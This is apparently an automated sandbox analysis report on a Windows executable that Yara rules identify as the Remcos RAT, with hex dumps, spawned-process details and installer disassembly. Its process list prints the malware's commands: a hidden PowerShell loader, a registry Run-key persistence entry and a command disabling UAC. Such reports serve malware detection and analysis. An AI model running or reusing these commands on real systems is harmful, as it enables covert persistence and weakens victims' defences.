                                    2024-09-02 14:20:44 UTC1390INData Raw: 62 56 7d 88 f5 e0 e9 39 82 22 14 2f 10 f1 e1 bb f0 a1 fb 7e ae dd 55 9b 7e 47 49 3c c3 57 32 c1 19 c2 9d aa b2 a1 b6 86 e9 8e ba 09 b6 be 41 b0 3a 38 ab bc df ab 9f ee e8 45 06 fd 41 02 f0 ef 7d c6 c6 4d 1c 05 a1 6c 49 d3 d7 fe 5a 0d ae 65 89 3f 73 cf c3 3a 43 b3 87 74 49 bf ab 23 54 b2 c7 f3 f7 52 d7 13 1f e5 ad 0a 37 b2 65 de ec aa 11 70 27 f8 51 69 d4 ce a1 1f 38 16 c7 27 cb 9f 50 9b ff e5 42 bc af 12 b6 7d 60 9d 87 f2 40 83 55 fc 2c aa 8b 5a 06 61 69 4f 1e e4 9e 74 36 3d ed 1d 5b 1a c0 fe c6 59 42 e6 d3 59 df f9 2f 5f d3 38 34 4e 66 6c e8 8f 77 43 3c b6 e3 c9 fe 2c da f3 14 a3 98 5e 13 00 dd 36 0a 84 ef 44 3b 5b fa e6 59 01 e8 92 f1 8f 7e 40 91 0f 11 b1 81 62 d3 21 ef a2 e0 4c b3 4c a8 e5 66 3f 22 ac e4 1f 05 2e cb 95 6e c0 1c 5d 96 09 34 8a 5f 9e 80
                                    Data Ascii: bV}9"/~U~GI<W2A:8EA}MlIZe?s:CtI#TR7ep'Qi8'PB}`@U,ZaiOt6=[YBY/_84NflwC<,^6D;[Y~@b!LLf?".n]4_
                                    2024-09-02 14:20:44 UTC1390INData Raw: 46 0d 55 2b 3e e0 04 32 b2 84 88 6e 5f e0 b2 2e 48 61 89 ff 99 c9 f3 bd 42 27 cc dc 0f 52 d1 cd c6 65 f4 9d 0a f9 3e 90 31 41 cf e8 08 d7 dd 4b df 6f d8 b8 c0 c8 2c 6f 67 1e c2 8c 02 01 c7 38 ee d7 54 f7 da 19 cd 91 33 ef 0d 4d 96 09 9e f9 38 08 b0 2b c7 07 16 1b 7e 33 1f fa 82 bf 5a ec 7a 42 0b 93 35 c1 09 b3 b6 62 b0 eb 68 11 40 dd d9 74 e0 5f a4 e3 1e b6 3a cb 1c 92 b0 5e ca 70 91 14 05 cc 33 b3 78 ac fc 03 ff 70 7a ce e9 fc 6f fd 55 9e 69 49 94 fe a8 9d 55 3c fb b8 55 83 16 12 89 e2 fc 0f b5 0f 72 cb 58 6b 5f a8 8f 80 b0 b9 ea 3e c5 8a 0b ea 84 be 97 0f b5 2d d1 05 ec b1 58 c4 33 92 52 0f 68 f2 c0 8a de c4 43 b5 f5 4f f4 4e 5a 29 4d 2a 3e a3 1c 83 c7 13 80 c8 bc 8a bc fb a2 00 7d 0d 3a 47 7e ac d1 91 1e 2c 12 3d 45 da 2d 52 b5 da ab dc 2d 0c 6a 49 00
                                    Data Ascii: FU+>2n_.HaB'Re>1AKo,og8T3M8+~3ZzB5bh@t_:^p3xpzoUiIU<UrXk_>-X3RhCONZ)M*>}:G~,=E-R-jI
                                    2024-09-02 14:20:44 UTC1390INData Raw: ea 28 8a 5b 9b 68 98 b8 3f c8 7c 43 60 01 18 83 25 f4 9d bc bb 97 a8 54 f9 62 aa 2a 50 a9 3c e8 06 7d b5 84 a1 63 b9 b9 25 44 bc 4f 06 06 f4 bc 87 3c 89 27 2e 4d 38 b9 5b d4 bb 22 9f 64 c6 05 d3 2c 04 e2 99 7c 6a 7f d5 76 3a 89 1c 7b 9c 0f 13 b7 8e e0 e3 9b 66 c8 b0 04 39 7c c6 0d 66 c6 54 86 15 93 e1 57 ad 8a f7 a9 fb 4c 2c 67 84 4c ae 63 8f ff e0 3f c4 aa c4 3f 65 2d 60 3c 6b 1f 88 ae f1 dc f8 60 4f 2a 73 13 30 8c 3f e2 34 4f 15 27 88 d7 72 f8 a2 5c 56 1c 85 35 cf 6f 86 36 e6 c4 fa cd 56 e7 3b dc 17 ec f1 61 44 65 3c 06 bc b7 e9 99 e7 0e 94 94 fe fe d0 a3 c5 d5 cb 30 aa 64 49 75 51 d5 03 2f b8 cc 16 42 be 04 6c f6 e9 b5 5b b3 a3 d0 63 d3 d0 0e 84 38 0c 90 21 6f 54 5d 97 13 10 7a 92 8c da 24 89 35 fa df 2c 47 04 62 6f 33 9e df b2 69 a8 28 d5 2c 6c 99 f1
                                    Data Ascii: ([h?|C`%Tb*P<}c%DO<'.M8["d,|jv:{f9|fTWL,gLc??e-`<k`O*s0?4O'r\V5o6V;aDe<0dIuQ/Bl[c8!oT]z$5,Gbo3i(,l


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:10:19:43
                                    Start date:02/09/2024
                                    Path:C:\Users\user\Desktop\anziOUzZJs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\anziOUzZJs.exe"
                                    Imagebase:0x400000
                                    File size:469'904 bytes
                                    MD5 hash:61BDBE7854F1572202F7916CF7F03616
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:10:19:47
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"
                                    Imagebase:0x940000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:10:19:47
                                    Start date:02/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:11:34:01
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
                                    Imagebase:0x410000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:19
                                    Start time:11:34:01
                                    Start date:02/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:11:34:01
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\reg.exe
                                    Wow64 process (32bit):true
                                    Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
                                    Imagebase:0xea0000
                                    File size:59'392 bytes
                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:11:34:09
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                    Imagebase:0x410000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:23
                                    Start time:11:34:09
                                    Start date:02/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:24
                                    Start time:11:34:09
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\reg.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                    Imagebase:0xea0000
                                    File size:59'392 bytes
                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:26
                                    Start time:11:34:09
                                    Start date:02/09/2024
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Imagebase:0x7ff7b4ee0000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:33
                                    Start time:11:34:12
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 3448
                                    Imagebase:0x380000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:35
                                    Start time:11:34:17
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 2384
                                    Imagebase:0x380000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:21.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:23.2%
                                      Total number of Nodes:1287
                                      Total number of Limit Nodes:39
                                      execution_graph 3822 4027c1 3836 402a1d 3822->3836 3824 4027c7 3825 402802 3824->3825 3826 4027eb 3824->3826 3831 4026a6 3824->3831 3829 402818 3825->3829 3830 40280c 3825->3830 3827 4027f0 3826->3827 3828 4027ff 3826->3828 3839 405cf9 lstrcpynA 3827->3839 3828->3831 3840 405c57 wsprintfA 3828->3840 3833 405d1b 18 API calls 3829->3833 3832 402a1d 18 API calls 3830->3832 3832->3828 3833->3828 3837 405d1b 18 API calls 3836->3837 3838 402a31 3837->3838 3838->3824 3839->3831 3840->3831 3841 401cc2 3842 402a1d 18 API calls 3841->3842 3843 401cd2 SetWindowLongA 3842->3843 3844 4028cf 3843->3844 3845 401a43 3846 402a1d 18 API calls 3845->3846 3847 401a49 3846->3847 3848 402a1d 18 API calls 3847->3848 3849 4019f3 3848->3849 3052 401e44 3068 402a3a 3052->3068 3058 401e5a 3059 4026a6 3058->3059 3060 401eb0 CloseHandle 3058->3060 3061 401e79 WaitForSingleObject 3058->3061 3088 4060ce 3058->3088 3060->3059 3061->3058 3062 401e87 GetExitCodeProcess 3061->3062 3064 401ea4 3062->3064 3065 401e99 3062->3065 3064->3060 3066 401ea2 3064->3066 3092 405c57 wsprintfA 3065->3092 3066->3060 3069 402a46 3068->3069 3070 405d1b 18 API calls 3069->3070 3071 402a67 3070->3071 3072 401e4a 3071->3072 3073 405f64 5 API calls 3071->3073 3074 404f12 3072->3074 3073->3072 3075 404f2d 3074->3075 3084 401e54 3074->3084 3076 404f4a lstrlenA 3075->3076 3079 405d1b 18 API calls 3075->3079 3077 404f73 3076->3077 3078 404f58 lstrlenA 3076->3078 3081 404f86 3077->3081 3082 404f79 SetWindowTextA 3077->3082 3080 404f6a lstrcatA 3078->3080 3078->3084 3079->3076 3080->3077 3083 404f8c SendMessageA SendMessageA SendMessageA 3081->3083 3081->3084 3082->3081 3083->3084 3085 40548a CreateProcessA 3084->3085 3086 4054c9 3085->3086 3087 4054bd CloseHandle 3085->3087 3086->3058 3087->3086 3089 4060eb PeekMessageA 3088->3089 3090 4060e1 DispatchMessageA 3089->3090 3091 4060fb 3089->3091 3090->3089 3091->3061 3092->3066 3850 402644 3851 40264a 3850->3851 3852 402652 FindClose 3851->3852 3853 4028cf 3851->3853 3852->3853 3854 406344 3855 4061c8 3854->3855 3856 406b33 3855->3856 3857 406252 GlobalAlloc 3855->3857 3858 406249 GlobalFree 3855->3858 3859 4062c0 GlobalFree 3855->3859 3860 4062c9 GlobalAlloc 3855->3860 3857->3855 3857->3856 3858->3857 3859->3860 3860->3855 3860->3856 3861 4026c6 3862 402a3a 18 API calls 3861->3862 3863 4026d4 3862->3863 3864 4026ea 3863->3864 3865 402a3a 18 API calls 3863->3865 3866 405947 2 API calls 3864->3866 3865->3864 3867 4026f0 3866->3867 3889 40596c GetFileAttributesA CreateFileA 3867->3889 3869 4026fd 3870 4027a0 3869->3870 3871 402709 GlobalAlloc 3869->3871 3874 4027a8 DeleteFileA 3870->3874 3875 4027bb 3870->3875 3872 402722 3871->3872 3873 402797 CloseHandle 3871->3873 3890 403091 SetFilePointer 3872->3890 3873->3870 3874->3875 3877 402728 3878 40307b ReadFile 3877->3878 3879 402731 GlobalAlloc 3878->3879 3880 402741 3879->3880 3881 402775 3879->3881 3883 402e9f 36 API calls 3880->3883 3882 405a13 WriteFile 3881->3882 3884 402781 GlobalFree 3882->3884 3888 40274e 3883->3888 3885 402e9f 36 API calls 3884->3885 3886 402794 3885->3886 3886->3873 3887 40276c GlobalFree 3887->3881 3888->3887 3889->3869 3890->3877 3891 402847 3892 402a1d 18 API calls 3891->3892 3893 40284d 3892->3893 3894 4026a6 3893->3894 3895 40287e 3893->3895 3897 40285b 3893->3897 3895->3894 3896 405d1b 18 API calls 3895->3896 3896->3894 3897->3894 3899 405c57 wsprintfA 3897->3899 3899->3894 3900 4022c7 3901 402a3a 18 API calls 3900->3901 3902 4022d8 3901->3902 3903 402a3a 18 API calls 3902->3903 3904 4022e1 3903->3904 3905 402a3a 18 API calls 3904->3905 3906 4022eb GetPrivateProfileStringA 3905->3906 3365 405050 3366 405072 GetDlgItem GetDlgItem GetDlgItem 3365->3366 3367 4051fb 3365->3367 3410 403f13 SendMessageA 3366->3410 3369 405203 GetDlgItem CreateThread FindCloseChangeNotification 3367->3369 3370 40522b 3367->3370 3369->3370 3413 404fe4 OleInitialize 3369->3413 3372 405259 3370->3372 3373 405241 ShowWindow ShowWindow 3370->3373 3374 40527a 3370->3374 3371 4050e2 3380 4050e9 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3371->3380 3375 4052b4 3372->3375 3377 405269 3372->3377 3378 40528d ShowWindow 3372->3378 3412 403f13 SendMessageA 3373->3412 3379 403f45 8 API calls 3374->3379 3375->3374 3381 4052c1 SendMessageA 3375->3381 3382 403eb7 SendMessageA 3377->3382 3384 4052ad 3378->3384 3385 40529f 3378->3385 3383 405286 3379->3383 3386 405157 3380->3386 3387 40513b SendMessageA SendMessageA 3380->3387 3381->3383 3388 4052da CreatePopupMenu 3381->3388 3382->3374 3392 403eb7 SendMessageA 3384->3392 3391 404f12 25 API calls 3385->3391 3389 40516a 3386->3389 3390 40515c SendMessageA 3386->3390 3387->3386 3393 405d1b 18 API calls 3388->3393 3394 403ede 19 API calls 3389->3394 3390->3389 3391->3384 3392->3375 3395 4052ea AppendMenuA 3393->3395 3396 40517a 3394->3396 3397 405308 GetWindowRect 3395->3397 3398 40531b TrackPopupMenu 3395->3398 3399 405183 ShowWindow 3396->3399 3400 4051b7 GetDlgItem SendMessageA 3396->3400 3397->3398 3398->3383 3401 405337 3398->3401 3402 4051a6 3399->3402 3403 405199 ShowWindow 3399->3403 3400->3383 3404 4051de SendMessageA SendMessageA 3400->3404 3405 405356 SendMessageA 3401->3405 3411 403f13 SendMessageA 3402->3411 3403->3402 3404->3383 3405->3405 3406 405373 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3405->3406 3408 405395 SendMessageA 3406->3408 3408->3408 3409 4053b7 GlobalUnlock SetClipboardData CloseClipboard 3408->3409 3409->3383 3410->3371 3411->3400 3412->3372 3414 403f2a SendMessageA 3413->3414 3416 405007 3414->3416 3415 403f2a SendMessageA 3417 405040 OleUninitialize 3415->3417 3418 401389 2 API calls 3416->3418 3419 40502e 3416->3419 3418->3416 3419->3415 3453 401751 3454 402a3a 18 API calls 3453->3454 3455 401758 3454->3455 3456 401776 3455->3456 3457 40177e 3455->3457 3513 405cf9 lstrcpynA 3456->3513 3514 405cf9 lstrcpynA 3457->3514 3460 40177c 3464 405f64 5 API calls 3460->3464 3461 401789 3462 40576b 3 API calls 3461->3462 3463 40178f lstrcatA 3462->3463 3463->3460 3484 40179b 3464->3484 3465 405ffd 2 API calls 3465->3484 3466 405947 2 API calls 3466->3484 3468 4017b2 CompareFileTime 3468->3484 3469 401876 3471 404f12 25 API calls 3469->3471 3470 40184d 3472 404f12 25 API calls 3470->3472 3481 401862 3470->3481 3474 401880 3471->3474 3472->3481 3473 405cf9 lstrcpynA 3473->3484 3492 402e9f 3474->3492 3477 4018a7 SetFileTime 3478 4018b9 FindCloseChangeNotification 3477->3478 3480 4018ca 3478->3480 3478->3481 3479 405d1b 18 API calls 3479->3484 3482 4018e2 3480->3482 3483 4018cf 3480->3483 3486 405d1b 18 API calls 3482->3486 3485 405d1b 18 API calls 3483->3485 3484->3465 3484->3466 3484->3468 3484->3469 3484->3470 3484->3473 3484->3479 3487 4054ef MessageBoxIndirectA 3484->3487 3491 40596c GetFileAttributesA CreateFileA 3484->3491 3488 4018d7 lstrcatA 3485->3488 3489 4018ea 3486->3489 3487->3484 3488->3489 3490 4054ef MessageBoxIndirectA 3489->3490 3490->3481 3491->3484 3494 402eb5 3492->3494 3493 402ee0 3515 40307b 3493->3515 3494->3493 3525 403091 SetFilePointer 3494->3525 3498 401893 3498->3477 3498->3478 3499 40301b 3501 40301f 3499->3501 3505 403037 3499->3505 3500 402efd GetTickCount 3509 402f10 3500->3509 3502 40307b ReadFile 3501->3502 3502->3498 3503 40307b ReadFile 3503->3505 3504 40307b ReadFile 3504->3509 3505->3498 3505->3503 3506 405a13 WriteFile 3505->3506 3506->3505 3508 402f76 GetTickCount 3508->3509 3509->3498 3509->3504 3509->3508 3510 402f9f MulDiv wsprintfA 3509->3510 3512 405a13 WriteFile 3509->3512 3518 406195 3509->3518 3511 404f12 25 API calls 3510->3511 3511->3509 3512->3509 3513->3460 3514->3461 3516 4059e4 ReadFile 3515->3516 3517 402eeb 3516->3517 3517->3498 3517->3499 3517->3500 3519 4061ba 3518->3519 3524 4061c2 3518->3524 3519->3509 3520 406252 GlobalAlloc 3520->3519 3520->3524 3521 406249 GlobalFree 3521->3520 3522 4062c0 GlobalFree 3523 4062c9 GlobalAlloc 3522->3523 3523->3519 3523->3524 3524->3519 3524->3520 3524->3521 3524->3522 3524->3523 3525->3493 3917 401651 3918 402a3a 18 API calls 3917->3918 3919 401657 3918->3919 3920 405ffd 2 API calls 3919->3920 3921 40165d 3920->3921 3922 401951 3923 402a1d 18 API calls 3922->3923 3924 401958 3923->3924 3925 402a1d 18 API calls 3924->3925 3926 401962 3925->3926 3927 402a3a 18 API calls 3926->3927 3928 40196b 3927->3928 3929 40197e lstrlenA 3928->3929 3930 4019b9 3928->3930 3931 401988 3929->3931 3931->3930 3935 405cf9 lstrcpynA 3931->3935 3933 4019a2 3933->3930 3934 4019af lstrlenA 3933->3934 3934->3930 3935->3933 3936 4019d2 3937 402a3a 18 API calls 3936->3937 3938 4019d9 3937->3938 3939 402a3a 18 API calls 3938->3939 3940 4019e2 3939->3940 3941 4019e9 lstrcmpiA 3940->3941 3942 4019fb lstrcmpA 3940->3942 3943 4019ef 3941->3943 3942->3943 3944 4021d2 3945 402a3a 18 API calls 3944->3945 3946 4021d8 3945->3946 3947 402a3a 18 API calls 3946->3947 3948 4021e1 3947->3948 3949 402a3a 18 API calls 3948->3949 3950 4021ea 3949->3950 3951 405ffd 2 API calls 3950->3951 3952 4021f3 3951->3952 3953 402204 lstrlenA lstrlenA 3952->3953 3957 4021f7 3952->3957 3955 404f12 25 API calls 3953->3955 3954 404f12 25 API calls 3958 4021ff 3954->3958 3956 402240 SHFileOperationA 3955->3956 3956->3957 3956->3958 3957->3954 3957->3958 3959 402254 3960 40225b 3959->3960 3963 40226e 3959->3963 3961 405d1b 18 API calls 3960->3961 3962 402268 3961->3962 3964 4054ef MessageBoxIndirectA 3962->3964 3964->3963 3965 4042d5 3966 4042e5 3965->3966 3967 40430b 3965->3967 3968 403ede 19 API calls 3966->3968 3969 403f45 8 API calls 3967->3969 3970 4042f2 SetDlgItemTextA 3968->3970 3971 404317 3969->3971 3970->3967 3972 4014d6 3973 402a1d 18 API calls 3972->3973 3974 4014dc Sleep 3973->3974 3976 4028cf 3974->3976 3561 4030d9 SetErrorMode GetVersion 3562 403110 3561->3562 3563 403116 3561->3563 3564 406092 5 API calls 3562->3564 3565 406024 3 API calls 3563->3565 3564->3563 3566 40312c lstrlenA 3565->3566 3566->3563 3567 40313b 3566->3567 3568 406092 5 API calls 3567->3568 3569 403143 3568->3569 3570 406092 5 API calls 3569->3570 3571 40314a #17 OleInitialize SHGetFileInfoA 3570->3571 3649 405cf9 lstrcpynA 3571->3649 3573 403187 GetCommandLineA 3650 405cf9 lstrcpynA 3573->3650 3575 403199 GetModuleHandleA 3576 4031b0 3575->3576 3577 405796 CharNextA 3576->3577 3578 4031c4 CharNextA 3577->3578 3583 4031d4 3578->3583 3579 40329e 3580 4032b1 GetTempPathA 3579->3580 3651 4030a8 3580->3651 3582 4032c9 3584 403323 DeleteFileA 3582->3584 3585 4032cd GetWindowsDirectoryA lstrcatA 3582->3585 3583->3579 3586 405796 CharNextA 3583->3586 3591 4032a0 3583->3591 3661 402c66 GetTickCount GetModuleFileNameA 3584->3661 3588 4030a8 12 API calls 3585->3588 3586->3583 3590 4032e9 3588->3590 3589 403337 3594 4033bd 3589->3594 3598 405796 CharNextA 3589->3598 3644 4033cd 3589->3644 3590->3584 3593 4032ed GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3590->3593 3745 405cf9 lstrcpynA 3591->3745 3596 4030a8 12 API calls 3593->3596 3689 403679 3594->3689 3600 40331b 3596->3600 3601 403352 3598->3601 3600->3584 3600->3644 3608 403398 3601->3608 3609 4033fd 3601->3609 3602 403505 3605 403587 ExitProcess 3602->3605 3606 40350d GetCurrentProcess OpenProcessToken 3602->3606 3603 4033e7 3604 4054ef MessageBoxIndirectA 3603->3604 3610 4033f5 ExitProcess 3604->3610 3611 403558 3606->3611 3612 403528 LookupPrivilegeValueA AdjustTokenPrivileges 3606->3612 3614 405859 18 API calls 3608->3614 3615 405472 5 API calls 3609->3615 3613 406092 5 API calls 3611->3613 3612->3611 3616 40355f 3613->3616 3617 4033a3 3614->3617 3618 403402 lstrcatA 3615->3618 3619 403574 ExitWindowsEx 3616->3619 3623 403580 3616->3623 3617->3644 3746 405cf9 lstrcpynA 3617->3746 3620 403413 lstrcatA 3618->3620 3621 40341e lstrcatA lstrcmpiA 3618->3621 3619->3605 3619->3623 3620->3621 3622 40343a 3621->3622 3621->3644 3625 403446 3622->3625 3626 40343f 3622->3626 3627 40140b 2 API calls 3623->3627 3631 405455 2 API calls 3625->3631 3630 4053d8 4 API calls 3626->3630 3627->3605 3628 4033b2 3747 405cf9 lstrcpynA 3628->3747 3632 403444 3630->3632 3633 40344b SetCurrentDirectoryA 3631->3633 3632->3633 3634 403465 3633->3634 3635 40345a 3633->3635 3756 405cf9 lstrcpynA 3634->3756 3755 405cf9 lstrcpynA 3635->3755 3638 405d1b 18 API calls 3639 4034a4 DeleteFileA 3638->3639 3640 4034b1 CopyFileA 3639->3640 3646 403473 3639->3646 3640->3646 3641 4034f9 3643 405bb4 38 API calls 3641->3643 3642 405bb4 38 API calls 3642->3646 3643->3644 3748 40359f 3644->3748 3645 405d1b 18 API calls 3645->3646 3646->3638 3646->3641 3646->3642 3646->3645 3647 40548a 2 API calls 3646->3647 3648 4034e5 CloseHandle 3646->3648 3647->3646 3648->3646 3649->3573 3650->3575 3652 405f64 5 API calls 3651->3652 3653 4030b4 3652->3653 3654 4030be 3653->3654 3655 40576b 3 API calls 3653->3655 3654->3582 3656 4030c6 3655->3656 3657 405455 2 API calls 3656->3657 3658 4030cc 3657->3658 3757 40599b 3658->3757 3761 40596c GetFileAttributesA CreateFileA 3661->3761 3663 402ca6 3682 402cb6 3663->3682 3762 405cf9 lstrcpynA 3663->3762 3665 402ccc 3666 4057b2 2 API calls 3665->3666 3667 402cd2 3666->3667 3763 405cf9 lstrcpynA 3667->3763 3669 402cdd GetFileSize 3670 402dd9 3669->3670 3688 402cf4 3669->3688 3764 402c02 3670->3764 3672 402de2 3674 402e12 GlobalAlloc 3672->3674 3672->3682 3776 403091 SetFilePointer 3672->3776 3673 40307b ReadFile 3673->3688 3775 403091 SetFilePointer 3674->3775 3677 402e45 3679 402c02 6 API calls 3677->3679 3678 402e2d 3681 402e9f 36 API calls 3678->3681 3679->3682 3680 402dfb 3683 40307b ReadFile 3680->3683 3686 402e39 3681->3686 3682->3589 3685 402e06 3683->3685 3684 402c02 6 API calls 3684->3688 3685->3674 3685->3682 3686->3682 3686->3686 3687 402e76 SetFilePointer 3686->3687 3687->3682 3688->3670 3688->3673 3688->3677 3688->3682 3688->3684 3690 406092 5 API calls 3689->3690 3691 40368d 3690->3691 3692 403693 3691->3692 3693 4036a5 3691->3693 3786 405c57 wsprintfA 3692->3786 3694 405be0 3 API calls 3693->3694 3695 4036d0 3694->3695 3697 4036ee lstrcatA 3695->3697 3699 405be0 3 API calls 3695->3699 3698 4036a3 3697->3698 3777 40393e 3698->3777 3699->3697 3702 405859 18 API calls 3703 403720 3702->3703 3704 4037a9 3703->3704 3706 405be0 3 API calls 3703->3706 3705 405859 18 API calls 3704->3705 3707 4037af 3705->3707 3708 40374c 3706->3708 3709 4037bf LoadImageA 3707->3709 3710 405d1b 18 API calls 3707->3710 3708->3704 3713 403768 lstrlenA 3708->3713 3716 405796 CharNextA 3708->3716 3711 403865 3709->3711 3712 4037e6 RegisterClassA 3709->3712 3710->3709 3715 40140b 2 API calls 3711->3715 3714 40381c SystemParametersInfoA CreateWindowExA 3712->3714 3744 40386f 3712->3744 3717 403776 lstrcmpiA 3713->3717 3718 40379c 3713->3718 3714->3711 3722 40386b 3715->3722 3720 403766 3716->3720 3717->3718 3721 403786 GetFileAttributesA 3717->3721 3719 40576b 3 API calls 3718->3719 3724 4037a2 3719->3724 3720->3713 3725 403792 3721->3725 3723 40393e 19 API calls 3722->3723 3722->3744 3726 40387c 3723->3726 3787 405cf9 lstrcpynA 3724->3787 3725->3718 3728 4057b2 2 API calls 3725->3728 3729 403888 ShowWindow 3726->3729 3730 40390b 3726->3730 3728->3718 3732 406024 3 API calls 3729->3732 3731 404fe4 5 API calls 3730->3731 3733 403911 3731->3733 3734 4038a0 3732->3734 3735 403915 3733->3735 3736 40392d 3733->3736 3737 4038ae GetClassInfoA 3734->3737 3739 406024 3 API calls 3734->3739 3742 40140b 2 API calls 3735->3742 3735->3744 3738 40140b 2 API calls 3736->3738 3740 4038c2 GetClassInfoA RegisterClassA 3737->3740 3741 4038d8 